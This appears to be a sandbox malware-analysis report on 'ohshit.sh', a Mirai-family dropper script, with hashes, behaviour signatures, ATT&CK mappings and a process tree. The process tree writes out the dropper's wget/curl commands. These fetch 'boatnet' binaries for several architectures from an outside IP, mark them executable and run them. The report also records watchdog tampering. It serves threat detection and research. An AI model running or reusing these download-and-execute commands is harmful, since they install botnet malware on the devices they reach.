Analysis
-
max time kernel
12s -
max time network
47s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-01-2025 11:39
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
dfb20882adc5a8a441e05549d24a2888
-
SHA1
9cad12bea5d7cdf2c78c5a00b308f25923c59218
-
SHA256
19d701781a24a57e13181d054c7f3a70d3e205ad72be89fd29dcfa3084e5e396
-
SHA512
63ff945d55e5560f99d75c99656b03d1ef70a50900c3c8fcb93fa13d63540c11ba14585c78c202ace742fc924f75f01c4acf43141ff1f1f700ad10c8d72f4bb2
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 793 chmod 799 chmod 682 chmod 696 chmod 741 chmod 759 chmod 775 chmod 788 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/WTF 683 WTF /tmp/WTF 698 WTF /tmp/WTF 742 WTF /tmp/WTF 760 WTF /tmp/WTF 776 WTF /tmp/WTF 789 WTF /tmp/WTF 794 WTF /tmp/WTF 800 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-8.dat upx -
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 685 wget 688 curl 695 cat -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.mpsl wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:652 -
/usr/bin/wgetwget http://154.216.18.23/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:654
-
-
/usr/bin/curlcurl -O http://154.216.18.23/hiddenbin/boatnet.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/catcat boatnet.x862⤵PID:681
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:683
-
-
/usr/bin/wgetwget http://154.216.18.23/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:685
-
-
/usr/bin/curlcurl -O http://154.216.18.23/hiddenbin/boatnet.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:688
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:695
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:698
-
-
/usr/bin/wgetwget http://154.216.18.23/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:700
-
-
/usr/bin/curlcurl -O http://154.216.18.23/hiddenbin/boatnet.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/catcat boatnet.arc2⤵PID:740
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://154.216.18.23/hiddenbin/boatnet.i4682⤵PID:745
-
-
/usr/bin/curlcurl -O http://154.216.18.23/hiddenbin/boatnet.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/catcat boatnet.i4682⤵PID:757
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:760
-
-
/usr/bin/wgetwget http://154.216.18.23/hiddenbin/boatnet.i6862⤵PID:762
-
-
/usr/bin/curlcurl -O http://154.216.18.23/hiddenbin/boatnet.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/catcat boatnet.i6862⤵PID:773
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:776
-
-
/usr/bin/wgetwget http://154.216.18.23/hiddenbin/boatnet.x86_642⤵PID:778
-
-
/usr/bin/curlcurl -O http://154.216.18.23/hiddenbin/boatnet.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/catcat boatnet.x86_642⤵PID:787
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:789
-
-
/usr/bin/wgetwget http://154.216.18.23/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:790
-
-
/usr/bin/curlcurl -O http://154.216.18.23/hiddenbin/boatnet.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/catcat boatnet.mpsl2⤵PID:792
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:794
-
-
/usr/bin/wgetwget http://154.216.18.23/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:796
-
-
/usr/bin/curlcurl -O http://154.216.18.23/hiddenbin/boatnet.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/catcat boatnet.arm2⤵PID:798
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-njnpT3 WTF2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:800
-
-
/usr/bin/wgetwget http://154.216.18.23/hiddenbin/boatnet.arm52⤵PID:804
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD527ee60d65a0b0d6af2a477bb96ca20e9
SHA1cad4bba0734a87f2ff8eee097a92a140d5224d0b
SHA256895e78113e4b330ac980707b9488628d2ae48336d9ac494cfde7f603efc614e3
SHA5129c0b4eb1348b5b9289132551fad227a571a971d9ec69ddcc718001db6ee7ec66d89faf5c6007751a0428a4876ac26e072b9a202dc351cb6810ec99c4f76868b9
-
Filesize
105KB
MD5194b9bddea0fed8a1c658381aae3e658
SHA10985accf1d90f302910f13615359a64b5dd42a8a
SHA2569e35db01d13839e7c92014a0d4244d39bea63aa8ac011d252013567758fe50f3
SHA512cc793be8b7142430f465e6847323c3f015316738d500df66c7ad2430717fe7c873287a533e8ce55be6ea53886c2872230acbffefb8ae6c143306972860f0752e
-
Filesize
220B
MD5f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1750274b02d5f5b00026a4f55b020f4285c693533
SHA256219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA51236bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259
-
Filesize
220B
MD5a8f502a6fb3b7b940e922c951d9e493a
SHA1fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338
-
Filesize
31KB
MD576a7949d753bbc8a3b176cbb6a8146e7
SHA1c2cd22e7dcd8c00ace2af3bf4c9e3f85c66bbd99
SHA2568638fb2da0209be3bab25f3eee698a2e249bfb6313b7a67c7d05abddb2b1189c
SHA51207c0d865a1c080db18c50a98de4c8a6137e9684e307b5af531a027d9c11f09f4977d9bba16bb0959eacf0c58daf173290a556afb0e7b74faf0f772377e0519ae
-
Filesize
28KB
MD5eae146a902f2fe0cfaf85240434db7c6
SHA1f0d8349f832c17eafbc17adb648a5f104b008309
SHA256b48028f95d683e1dd1ab7b71f8d18c0b0ae27eecb13535fa846cb4b8be455610
SHA5124ec3bc79b2592f517cc42c4990e725d6ccc8e14b9b69f26de0cee032d7872f1956c3e6f9821cc95cbef4a768151b924cc2bab07e42b89e353ef6bea0afc65e40